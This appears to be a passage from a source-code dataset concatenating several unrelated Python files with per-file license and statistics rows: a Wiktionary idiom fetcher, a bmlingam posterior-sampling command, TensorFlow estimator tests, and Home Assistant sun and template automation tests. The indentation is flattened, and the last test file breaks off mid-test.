--verbose Print dots and stuff to note progress
--debug Print debug logging
"""
import logging
import re
import sys
import docopt
import mwapi
from .util import dump_observation
def main(argv=None):
args = docopt.docopt(__doc__, argv=argv)
logging.basicConfig(
level=logging.INFO if not args['--debug'] else logging.DEBUG,
format='%(asctime)s %(levelname)s:%(name)s -- %(message)s'
)
logging.getLogger('requests').setLevel(logging.WARNING)
if args['--output'] == "<stdout>":
output = sys.stdout
else:
output = open(args['--output'], 'w')
verbose = args['--verbose']
run(output, verbose)
def is_idiom(phrase):
"""
Checks if a phrase meets certain criteria to make it an idiom
"""
if re.match('Category:English|Citation:|Appendix:', phrase):
return False
# One word phrases
if re.match(r"^[\w\-\']+$", phrase):
return False
# Two-worded phrases
if re.match(r"^[\w\-\']+ [\w\-\']+$", phrase):
return False
# Similes
if 'as a' in phrase:
return False
return True
def fetch():
session = mwapi.Session("https://en.wiktionary.org")
results = session.get(
action='query',
list='categorymembers',
cmtitle="Category:English idioms",
formatversion=2,
continuation=True)
idioms = []
for doc in results:
for page_doc in doc['query']['categorymembers']:
phrase = page_doc['title']
if not is_idiom(phrase):
continue
idioms.append(phrase)
return idioms
def run(output, verbose):
logger = logging.getLogger(__name__)
if verbose:
logger.info('Fetching idioms...')
idioms = fetch()
for idiom in idioms:
dump_observation(idiom, output)
| mit | -3,024,613,572,800,338,000 | 23.217391 | 69 | 0.552586 | false |
taku-y/bmlingam | bmlingam/commands/bmlingam_coeff.py | 1 | 5844 | # -*- coding: utf-8 -*-
"""Include functions used in command bin/bmlingam-coeff.
"""
# Author: Taku Yoshioka
# License: MIT
from argparse import ArgumentParser
import matplotlib.pyplot as plt
import numpy as np
from bmlingam import load_pklz, MCMCParams, infer_coef_posterior
def parse_args_bmlingam_coeff(args=None):
parser = ArgumentParser()
# Positional arguments
parser.add_argument('optmodel_file', type=str,
help='Optimal model file.')
# Positional arguments
parser.add_argument('--plot_figure',
dest='is_plot_figure', action='store_true',
help="""If this option is choosen,
a plot of the posterior samples
will be plotted.""")
parser.add_argument('--no_plot_figure',
dest='is_plot_figure', action='store_false',
help="""If this option is choosen (default),
a plot of the posterior samples
will not be plotted.""")
parser.set_defaults(is_plot_figure=False)
parser.add_argument('--save_figure',
dest='is_save_figure', action='store_true',
help="""If this option is choosen (default),
a plot of the posterior samples
will be saved into a file.""")
parser.add_argument('--no_save_figure',
dest='is_save_figure', action='store_false',
help="""If this option is choosen,
a plot of the posterior samples
will not be saved.""")
parser.set_defaults(is_save_figure=True)
parser.add_argument('--save_posterior',
dest='is_save_posterior', action='store_true',
help="""If this option is choosen (default),
the posterior samples
will be saved into a file.""")
parser.add_argument('--no_save_posterior',
dest='is_save_posterior', action='store_false',
help="""If this option is choosen,
the posterior samples
will not be saved.""")
parser.set_defaults(is_save_posterior=True)
parser.add_argument('--figtype',
dest='fig_ext', type=str,
choices=['pdf', 'png'],
help="""Figure file type (pdf or png).
Default is png. """)
parser.set_defaults(fig_ext='png')
# Get default setting
default = MCMCParams()
parser.add_argument('--n_mcmc_samples',
default=default.n_mcmc_samples, type=int,
help="""The number of MCMC samples (after burn-in).
Default is {}.
""".format(default.n_mcmc_samples))
parser.add_argument('--n_burn',
default=default.n_burn, type=int,
help="""The number of burn-in samples in MCMC.
Default is {}.
""".format(default.n_burn))
parser.add_argument('--seed',
default=default.seed, type=int,
help="""Specify the seed of random number generator used in
posterior sampling by MCMC. Default is {}.
""".format(default.seed))
parser.add_argument('--seed_burn',
default=default.seed_burn, type=int,
help="""Specify the seed of random number generator used in
the burn-in period of posterior sampling.
Default is {}.
""".format(default.seed_burn))
args_ = parser.parse_args(args)
params = {
'optmodel_file': args_.optmodel_file,
'mcmc_params': MCMCParams(
n_mcmc_samples=args_.n_mcmc_samples,
n_burn=args_.n_burn,
seed=args_.seed,
seed_burn=args_.seed_burn,
),
'is_plot_figure': args_.is_plot_figure,
'is_save_figure': args_.is_save_figure,
'is_save_posterior': args_.is_save_posterior,
'fig_ext': ('.' + args_.fig_ext)
}
return params
def bmlingam_coeff(
optmodel_file, mcmc_params, is_plot_figure, is_save_figure,
is_save_posterior, fig_ext):
"""Estimate posterior distribution of regression coefficient.
The bmlingam model is specified with optmodel_file.
"""
# Load optimal model info
print(optmodel_file)
optmodel = load_pklz(optmodel_file)
xs = optmodel['xs']
hparams = optmodel['hparams']
causality_str = optmodel['causality_str']
varnames = [optmodel['x1_name'], optmodel['x2_name']]
# Plot parameters
plot_figure = is_plot_figure or is_save_figure
show_plot = is_plot_figure
# Infer posterior
trace = infer_coef_posterior(xs, hparams, mcmc_params, varnames,
causality_str, 1, plot_figure, show_plot)
# Save plot
if is_save_figure:
fig_file = optmodel_file.replace('.pklz', fig_ext)
plt.savefig(fig_file)
print('A figure of the distribution of the posterior samples' +
'was saved as %s.' % fig_file)
# Save posterior samples (MCMC trace)
if is_save_posterior:
csv_file = optmodel_file.replace('.pklz', '.post.csv')
np.savetxt(csv_file, trace, delimiter=',')
print('Posterior samples was saved as %s.' % csv_file)
| mit | -4,117,505,851,537,802,000 | 39.303448 | 84 | 0.515914 | false |
girving/tensorflow | tensorflow/contrib/estimator/python/estimator/dnn_linear_combined_test.py | 12 | 8059 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for dnn_linear_combined.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import tempfile
import numpy as np
import six
from tensorflow.contrib.estimator.python.estimator import dnn_linear_combined
from tensorflow.contrib.estimator.python.estimator import head as head_lib
from tensorflow.python.estimator.canned import dnn_testing_utils
from tensorflow.python.estimator.canned import linear_testing_utils
from tensorflow.python.estimator.canned import prediction_keys
from tensorflow.python.estimator.export import export
from tensorflow.python.estimator.inputs import numpy_io
from tensorflow.python.feature_column import feature_column
from tensorflow.python.framework import ops
from tensorflow.python.ops import nn
from tensorflow.python.ops.losses import losses
from tensorflow.python.platform import gfile
from tensorflow.python.platform import test
from tensorflow.python.summary.writer import writer_cache
def _dnn_only_estimator_fn(
hidden_units,
feature_columns,
model_dir=None,
label_dimension=1,
weight_column=None,
optimizer='Adagrad',
activation_fn=nn.relu,
dropout=None,
input_layer_partitioner=None,
config=None):
return dnn_linear_combined.DNNLinearCombinedEstimator(
head=head_lib.regression_head(
weight_column=weight_column, label_dimension=label_dimension,
# Tests in core (from which this test inherits) test the sum loss.
loss_reduction=losses.Reduction.SUM),
model_dir=model_dir,
dnn_feature_columns=feature_columns,
dnn_optimizer=optimizer,
dnn_hidden_units=hidden_units,
dnn_activation_fn=activation_fn,
dnn_dropout=dropout,
input_layer_partitioner=input_layer_partitioner,
config=config)
class DNNOnlyEstimatorEvaluateTest(
dnn_testing_utils.BaseDNNRegressorEvaluateTest, test.TestCase):
def __init__(self, methodName='runTest'): # pylint: disable=invalid-name
test.TestCase.__init__(self, methodName)
dnn_testing_utils.BaseDNNRegressorEvaluateTest.__init__(
self, _dnn_only_estimator_fn)
class DNNOnlyEstimatorPredictTest(
dnn_testing_utils.BaseDNNRegressorPredictTest, test.TestCase):
def __init__(self, methodName='runTest'): # pylint: disable=invalid-name
test.TestCase.__init__(self, methodName)
dnn_testing_utils.BaseDNNRegressorPredictTest.__init__(
self, _dnn_only_estimator_fn)
class DNNOnlyEstimatorTrainTest(
dnn_testing_utils.BaseDNNRegressorTrainTest, test.TestCase):
def __init__(self, methodName='runTest'): # pylint: disable=invalid-name
test.TestCase.__init__(self, methodName)
dnn_testing_utils.BaseDNNRegressorTrainTest.__init__(
self, _dnn_only_estimator_fn)
def _linear_only_estimator_fn(
feature_columns,
model_dir=None,
label_dimension=1,
weight_column=None,
optimizer='Ftrl',
config=None,
partitioner=None,
sparse_combiner='sum'):
return dnn_linear_combined.DNNLinearCombinedEstimator(
head=head_lib.regression_head(
weight_column=weight_column, label_dimension=label_dimension,
# Tests in core (from which this test inherits) test the sum loss.
loss_reduction=losses.Reduction.SUM),
model_dir=model_dir,
linear_feature_columns=feature_columns,
linear_optimizer=optimizer,
input_layer_partitioner=partitioner,
config=config,
linear_sparse_combiner=sparse_combiner)
class LinearOnlyEstimatorEvaluateTest(
linear_testing_utils.BaseLinearRegressorEvaluationTest, test.TestCase):
def __init__(self, methodName='runTest'): # pylint: disable=invalid-name
test.TestCase.__init__(self, methodName)
linear_testing_utils.BaseLinearRegressorEvaluationTest.__init__(
self, _linear_only_estimator_fn)
class LinearOnlyEstimatorPredictTest(
linear_testing_utils.BaseLinearRegressorPredictTest, test.TestCase):
def __init__(self, methodName='runTest'): # pylint: disable=invalid-name
test.TestCase.__init__(self, methodName)
linear_testing_utils.BaseLinearRegressorPredictTest.__init__(
self, _linear_only_estimator_fn)
class LinearOnlyEstimatorTrainTest(
linear_testing_utils.BaseLinearRegressorTrainingTest, test.TestCase):
def __init__(self, methodName='runTest'): # pylint: disable=invalid-name
test.TestCase.__init__(self, methodName)
linear_testing_utils.BaseLinearRegressorTrainingTest.__init__(
self, _linear_only_estimator_fn)
class DNNLinearCombinedEstimatorIntegrationTest(test.TestCase):
def setUp(self):
self._model_dir = tempfile.mkdtemp()
def tearDown(self):
if self._model_dir:
writer_cache.FileWriterCache.clear()
shutil.rmtree(self._model_dir)
def _test_complete_flow(
self, train_input_fn, eval_input_fn, predict_input_fn, input_dimension,
label_dimension, batch_size):
linear_feature_columns = [
feature_column.numeric_column('x', shape=(input_dimension,))]
dnn_feature_columns = [
feature_column.numeric_column('x', shape=(input_dimension,))]
feature_columns = linear_feature_columns + dnn_feature_columns
est = dnn_linear_combined.DNNLinearCombinedEstimator(
head=head_lib.regression_head(label_dimension=label_dimension),
linear_feature_columns=linear_feature_columns,
dnn_feature_columns=dnn_feature_columns,
dnn_hidden_units=(2, 2),
model_dir=self._model_dir)
# TRAIN
num_steps = 10
est.train(train_input_fn, steps=num_steps)
# EVALUTE
scores = est.evaluate(eval_input_fn)
self.assertEqual(num_steps, scores[ops.GraphKeys.GLOBAL_STEP])
self.assertIn('loss', six.iterkeys(scores))
# PREDICT
predictions = np.array([
x[prediction_keys.PredictionKeys.PREDICTIONS]
for x in est.predict(predict_input_fn)
])
self.assertAllEqual((batch_size, label_dimension), predictions.shape)
# EXPORT
feature_spec = feature_column.make_parse_example_spec(feature_columns)
serving_input_receiver_fn = export.build_parsing_serving_input_receiver_fn(
feature_spec)
export_dir = est.export_savedmodel(tempfile.mkdtemp(),
serving_input_receiver_fn)
self.assertTrue(gfile.Exists(export_dir))
def test_numpy_input_fn(self):
"""Tests complete flow with numpy_input_fn."""
label_dimension = 2
batch_size = 10
data = np.linspace(0., 2., batch_size * label_dimension, dtype=np.float32)
data = data.reshape(batch_size, label_dimension)
# learn y = x
train_input_fn = numpy_io.numpy_input_fn(
x={'x': data},
y=data,
batch_size=batch_size,
num_epochs=None,
shuffle=True)
eval_input_fn = numpy_io.numpy_input_fn(
x={'x': data},
y=data,
batch_size=batch_size,
shuffle=False)
predict_input_fn = numpy_io.numpy_input_fn(
x={'x': data},
batch_size=batch_size,
shuffle=False)
self._test_complete_flow(
train_input_fn=train_input_fn,
eval_input_fn=eval_input_fn,
predict_input_fn=predict_input_fn,
input_dimension=label_dimension,
label_dimension=label_dimension,
batch_size=batch_size)
if __name__ == '__main__':
test.main()
| apache-2.0 | -3,234,208,295,958,200,300 | 34.502203 | 80 | 0.70232 | false |
miniconfig/home-assistant | tests/components/automation/test_sun.py | 7 | 14025 | """The tests for the sun automation."""
from datetime import datetime
import unittest
from unittest.mock import patch
from homeassistant.core import callback
from homeassistant.setup import setup_component
from homeassistant.components import sun
import homeassistant.components.automation as automation
import homeassistant.util.dt as dt_util
from tests.common import (
fire_time_changed, get_test_home_assistant, mock_component)
# pylint: disable=invalid-name
class TestAutomationSun(unittest.TestCase):
"""Test the sun automation."""
def setUp(self):
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
mock_component(self.hass, 'group')
mock_component(self.hass, 'sun')
self.calls = []
@callback
def record_call(service):
"""Call recorder."""
self.calls.append(service)
self.hass.services.register('test', 'automation', record_call)
def tearDown(self):
"""Stop everything that was started."""
self.hass.stop()
def test_sunset_trigger(self):
"""Test the sunset trigger."""
self.hass.states.set(sun.ENTITY_ID, sun.STATE_ABOVE_HORIZON, {
sun.STATE_ATTR_NEXT_SETTING: '2015-09-16T02:00:00Z',
})
now = datetime(2015, 9, 15, 23, tzinfo=dt_util.UTC)
trigger_time = datetime(2015, 9, 16, 2, tzinfo=dt_util.UTC)
with patch('homeassistant.util.dt.utcnow',
return_value=now):
setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'sun',
'event': 'sunset',
},
'action': {
'service': 'test.automation',
}
}
})
automation.turn_off(self.hass)
self.hass.block_till_done()
fire_time_changed(self.hass, trigger_time)
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
with patch('homeassistant.util.dt.utcnow',
return_value=now):
automation.turn_on(self.hass)
self.hass.block_till_done()
fire_time_changed(self.hass, trigger_time)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
def test_sunrise_trigger(self):
"""Test the sunrise trigger."""
self.hass.states.set(sun.ENTITY_ID, sun.STATE_ABOVE_HORIZON, {
sun.STATE_ATTR_NEXT_RISING: '2015-09-16T14:00:00Z',
})
now = datetime(2015, 9, 13, 23, tzinfo=dt_util.UTC)
trigger_time = datetime(2015, 9, 16, 14, tzinfo=dt_util.UTC)
with patch('homeassistant.util.dt.utcnow',
return_value=now):
setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'sun',
'event': 'sunrise',
},
'action': {
'service': 'test.automation',
}
}
})
fire_time_changed(self.hass, trigger_time)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
def test_sunset_trigger_with_offset(self):
"""Test the sunset trigger with offset."""
self.hass.states.set(sun.ENTITY_ID, sun.STATE_ABOVE_HORIZON, {
sun.STATE_ATTR_NEXT_SETTING: '2015-09-16T02:00:00Z',
})
now = datetime(2015, 9, 15, 23, tzinfo=dt_util.UTC)
trigger_time = datetime(2015, 9, 16, 2, 30, tzinfo=dt_util.UTC)
with patch('homeassistant.util.dt.utcnow',
return_value=now):
setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'sun',
'event': 'sunset',
'offset': '0:30:00'
},
'action': {
'service': 'test.automation',
'data_template': {
'some':
'{{ trigger.%s }}' % '}} - {{ trigger.'.join((
'platform', 'event', 'offset'))
},
}
}
})
fire_time_changed(self.hass, trigger_time)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
self.assertEqual('sun - sunset - 0:30:00', self.calls[0].data['some'])
def test_sunrise_trigger_with_offset(self):
"""Test the runrise trigger with offset."""
self.hass.states.set(sun.ENTITY_ID, sun.STATE_ABOVE_HORIZON, {
sun.STATE_ATTR_NEXT_RISING: '2015-09-16T14:00:00Z',
})
now = datetime(2015, 9, 13, 23, tzinfo=dt_util.UTC)
trigger_time = datetime(2015, 9, 16, 13, 30, tzinfo=dt_util.UTC)
with patch('homeassistant.util.dt.utcnow',
return_value=now):
setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'sun',
'event': 'sunrise',
'offset': '-0:30:00'
},
'action': {
'service': 'test.automation',
}
}
})
fire_time_changed(self.hass, trigger_time)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
def test_if_action_before(self):
"""Test if action was before."""
self.hass.states.set(sun.ENTITY_ID, sun.STATE_ABOVE_HORIZON, {
sun.STATE_ATTR_NEXT_RISING: '2015-09-16T14:00:00Z',
})
setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'event',
'event_type': 'test_event',
},
'condition': {
'condition': 'sun',
'before': 'sunrise',
},
'action': {
'service': 'test.automation'
}
}
})
now = datetime(2015, 9, 16, 15, tzinfo=dt_util.UTC)
with patch('homeassistant.util.dt.now',
return_value=now):
self.hass.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
now = datetime(2015, 9, 16, 10, tzinfo=dt_util.UTC)
with patch('homeassistant.util.dt.now',
return_value=now):
self.hass.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
def test_if_action_after(self):
"""Test if action was after."""
self.hass.states.set(sun.ENTITY_ID, sun.STATE_ABOVE_HORIZON, {
sun.STATE_ATTR_NEXT_RISING: '2015-09-16T14:00:00Z',
})
setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'event',
'event_type': 'test_event',
},
'condition': {
'condition': 'sun',
'after': 'sunrise',
},
'action': {
'service': 'test.automation'
}
}
})
now = datetime(2015, 9, 16, 13, tzinfo=dt_util.UTC)
with patch('homeassistant.util.dt.now',
return_value=now):
self.hass.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
now = datetime(2015, 9, 16, 15, tzinfo=dt_util.UTC)
with patch('homeassistant.util.dt.now',
return_value=now):
self.hass.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
def test_if_action_before_with_offset(self):
"""Test if action was before offset."""
self.hass.states.set(sun.ENTITY_ID, sun.STATE_ABOVE_HORIZON, {
sun.STATE_ATTR_NEXT_RISING: '2015-09-16T14:00:00Z',
})
setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'event',
'event_type': 'test_event',
},
'condition': {
'condition': 'sun',
'before': 'sunrise',
'before_offset': '+1:00:00'
},
'action': {
'service': 'test.automation'
}
}
})
now = datetime(2015, 9, 16, 15, 1, tzinfo=dt_util.UTC)
with patch('homeassistant.util.dt.now',
return_value=now):
self.hass.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
now = datetime(2015, 9, 16, 15, tzinfo=dt_util.UTC)
with patch('homeassistant.util.dt.now',
return_value=now):
self.hass.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
def test_if_action_after_with_offset(self):
"""Test if action was after offset."""
self.hass.states.set(sun.ENTITY_ID, sun.STATE_ABOVE_HORIZON, {
sun.STATE_ATTR_NEXT_RISING: '2015-09-16T14:00:00Z',
})
setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'event',
'event_type': 'test_event',
},
'condition': {
'condition': 'sun',
'after': 'sunrise',
'after_offset': '+1:00:00'
},
'action': {
'service': 'test.automation'
}
}
})
now = datetime(2015, 9, 16, 14, 59, tzinfo=dt_util.UTC)
with patch('homeassistant.util.dt.now',
return_value=now):
self.hass.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
now = datetime(2015, 9, 16, 15, tzinfo=dt_util.UTC)
with patch('homeassistant.util.dt.now',
return_value=now):
self.hass.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
def test_if_action_before_and_after_during(self):
"""Test if action was before and after during."""
self.hass.states.set(sun.ENTITY_ID, sun.STATE_ABOVE_HORIZON, {
sun.STATE_ATTR_NEXT_RISING: '2015-09-16T10:00:00Z',
sun.STATE_ATTR_NEXT_SETTING: '2015-09-16T15:00:00Z',
})
setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'event',
'event_type': 'test_event',
},
'condition': {
'condition': 'sun',
'after': 'sunrise',
'before': 'sunset'
},
'action': {
'service': 'test.automation'
}
}
})
now = datetime(2015, 9, 16, 9, 59, tzinfo=dt_util.UTC)
with patch('homeassistant.util.dt.now',
return_value=now):
self.hass.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
now = datetime(2015, 9, 16, 15, 1, tzinfo=dt_util.UTC)
with patch('homeassistant.util.dt.now',
return_value=now):
self.hass.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
now = datetime(2015, 9, 16, 12, tzinfo=dt_util.UTC)
with patch('homeassistant.util.dt.now',
return_value=now):
self.hass.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
def test_if_action_after_different_tz(self):
"""Test if action was after in a different timezone."""
import pytz
self.hass.states.set(sun.ENTITY_ID, sun.STATE_ABOVE_HORIZON, {
sun.STATE_ATTR_NEXT_SETTING: '2015-09-16T17:30:00Z',
})
setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'event',
'event_type': 'test_event',
},
'condition': {
'condition': 'sun',
'after': 'sunset',
},
'action': {
'service': 'test.automation'
}
}
})
# Before
now = datetime(2015, 9, 16, 17, tzinfo=pytz.timezone('US/Mountain'))
with patch('homeassistant.util.dt.now',
return_value=now):
self.hass.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
# After
now = datetime(2015, 9, 16, 18, tzinfo=pytz.timezone('US/Mountain'))
with patch('homeassistant.util.dt.now',
return_value=now):
self.hass.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
| mit | -6,312,618,687,379,220,000 | 34.327456 | 78 | 0.488414 | false |
aronsky/home-assistant | tests/components/automation/test_template.py | 2 | 14776 | """The tests for the Template automation."""
import unittest
from homeassistant.core import Context, callback
from homeassistant.setup import setup_component
import homeassistant.components.automation as automation
from tests.common import (
get_test_home_assistant, assert_setup_component, mock_component)
from tests.components.automation import common
# pylint: disable=invalid-name
class TestAutomationTemplate(unittest.TestCase):
"""Test the event automation."""
def setUp(self):
"""Set up things to be run when tests are started."""
self.hass = get_test_home_assistant()
mock_component(self.hass, 'group')
self.hass.states.set('test.entity', 'hello')
self.calls = []
@callback
def record_call(service):
"""Record calls."""
self.calls.append(service)
self.hass.services.register('test', 'automation', record_call)
def tearDown(self):
"""Stop everything that was started."""
self.hass.stop()
def test_if_fires_on_change_bool(self):
"""Test for firing on boolean change."""
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template': '{{ true }}',
},
'action': {
'service': 'test.automation'
}
}
})
self.hass.states.set('test.entity', 'world')
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
common.turn_off(self.hass)
self.hass.block_till_done()
self.hass.states.set('test.entity', 'planet')
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
def test_if_fires_on_change_str(self):
"""Test for firing on change."""
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template': 'true',
},
'action': {
'service': 'test.automation'
}
}
})
self.hass.states.set('test.entity', 'world')
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
def test_if_fires_on_change_str_crazy(self):
"""Test for firing on change."""
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template': 'TrUE',
},
'action': {
'service': 'test.automation'
}
}
})
self.hass.states.set('test.entity', 'world')
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
def test_if_not_fires_on_change_bool(self):
"""Test for not firing on boolean change."""
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template': '{{ false }}',
},
'action': {
'service': 'test.automation'
}
}
})
self.hass.states.set('test.entity', 'world')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
def test_if_not_fires_on_change_str(self):
"""Test for not firing on string change."""
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template': 'False',
},
'action': {
'service': 'test.automation'
}
}
})
self.hass.states.set('test.entity', 'world')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
def test_if_not_fires_on_change_str_crazy(self):
"""Test for not firing on string change."""
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template': 'Anything other than "true" is false.',
},
'action': {
'service': 'test.automation'
}
}
})
self.hass.states.set('test.entity', 'world')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
def test_if_fires_on_no_change(self):
"""Test for firing on no change."""
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template': '{{ true }}',
},
'action': {
'service': 'test.automation'
}
}
})
self.hass.block_till_done()
self.calls = []
self.hass.states.set('test.entity', 'hello')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
def test_if_fires_on_two_change(self):
"""Test for firing on two changes."""
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template': '{{ true }}',
},
'action': {
'service': 'test.automation'
}
}
})
# Trigger once
self.hass.states.set('test.entity', 'world')
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
# Trigger again
self.hass.states.set('test.entity', 'world')
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
def test_if_fires_on_change_with_template(self):
"""Test for firing on change with template."""
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template': '{{ is_state("test.entity", "world") }}',
},
'action': {
'service': 'test.automation'
}
}
})
self.hass.states.set('test.entity', 'world')
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
def test_if_not_fires_on_change_with_template(self):
"""Test for not firing on change with template."""
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template': '{{ is_state("test.entity", "hello") }}',
},
'action': {
'service': 'test.automation'
}
}
})
self.hass.block_till_done()
self.calls = []
self.hass.states.set('test.entity', 'world')
self.hass.block_till_done()
assert len(self.calls) == 0
def test_if_fires_on_change_with_template_advanced(self):
"""Test for firing on change with template advanced."""
context = Context()
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template': '{{ is_state("test.entity", "world") }}'
},
'action': {
'service': 'test.automation',
'data_template': {
'some':
'{{ trigger.%s }}' % '}} - {{ trigger.'.join((
'platform', 'entity_id', 'from_state.state',
'to_state.state'))
},
}
}
})
self.hass.block_till_done()
self.calls = []
self.hass.states.set('test.entity', 'world', context=context)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
assert self.calls[0].context is context
self.assertEqual(
'template - test.entity - hello - world',
self.calls[0].data['some'])
def test_if_fires_on_no_change_with_template_advanced(self):
"""Test for firing on no change with template advanced."""
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template': '''{%- if is_state("test.entity", "world") -%}
true
{%- else -%}
false
{%- endif -%}''',
},
'action': {
'service': 'test.automation'
}
}
})
# Different state
self.hass.states.set('test.entity', 'worldz')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
# Different state
self.hass.states.set('test.entity', 'hello')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
def test_if_fires_on_change_with_template_2(self):
"""Test for firing on change with template."""
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template':
'{{ not is_state("test.entity", "world") }}',
},
'action': {
'service': 'test.automation'
}
}
})
self.hass.block_till_done()
self.calls = []
self.hass.states.set('test.entity', 'world')
self.hass.block_till_done()
assert len(self.calls) == 0
self.hass.states.set('test.entity', 'home')
self.hass.block_till_done()
assert len(self.calls) == 1
self.hass.states.set('test.entity', 'work')
self.hass.block_till_done()
assert len(self.calls) == 1
self.hass.states.set('test.entity', 'not_home')
self.hass.block_till_done()
assert len(self.calls) == 1
self.hass.states.set('test.entity', 'world')
self.hass.block_till_done()
assert len(self.calls) == 1
self.hass.states.set('test.entity', 'home')
self.hass.block_till_done()
assert len(self.calls) == 2
def test_if_action(self):
"""Test for firing if action."""
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'event',
'event_type': 'test_event',
},
'condition': [{
'condition': 'template',
'value_template': '{{ is_state("test.entity", "world") }}'
}],
'action': {
'service': 'test.automation'
}
}
})
# Condition is not true yet
self.hass.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
# Change condition to true, but it shouldn't be triggered yet
self.hass.states.set('test.entity', 'world')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
# Condition is true and event is triggered
self.hass.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
def test_if_fires_on_change_with_bad_template(self):
"""Test for firing on change with bad template."""
with assert_setup_component(0):
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template': '{{ ',
},
'action': {
'service': 'test.automation'
}
}
})
def test_if_fires_on_change_with_bad_template_2(self):
"""Test for firing on change with bad template."""
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template': '{{ xyz | round(0) }}',
},
'action': {
'service': 'test.automation'
}
}
})
self.hass.states.set('test.entity', 'world')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
def test_wait_template_with_trigger(self):
"""Test using wait template with 'trigger.entity_id'."""
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template':
"{{ states.test.entity.state == 'world' }}",
},
'action': [
{'wait_template':
"{{ is_state(trigger.entity_id, 'hello') }}"},
{'service': 'test.automation',
'data_template': {
'some':
